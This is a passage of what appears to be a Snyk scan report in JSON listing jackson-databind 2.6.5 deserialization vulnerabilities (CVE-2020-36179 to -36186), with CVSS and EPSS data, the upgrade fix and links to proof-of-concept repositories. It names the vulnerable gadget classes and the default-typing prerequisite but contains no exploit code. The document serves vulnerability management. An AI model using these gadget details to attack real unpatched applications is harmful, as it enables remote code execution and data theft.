If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36186" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:05:16.831143Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.206083Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.695573Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + 
"severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.249724Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36180" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:08:29.105792Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:05:51Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.705041Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3003", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + 
"cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.268380Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36183" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:11:36.206859Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:10:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.627750Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.831271Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + 
"severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.319616Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.72318", + "probability": "0.00357", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36179" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:29:22.463416Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:12:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.759947Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.436792Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36182" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:30:54.237288Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:30:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.693276Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
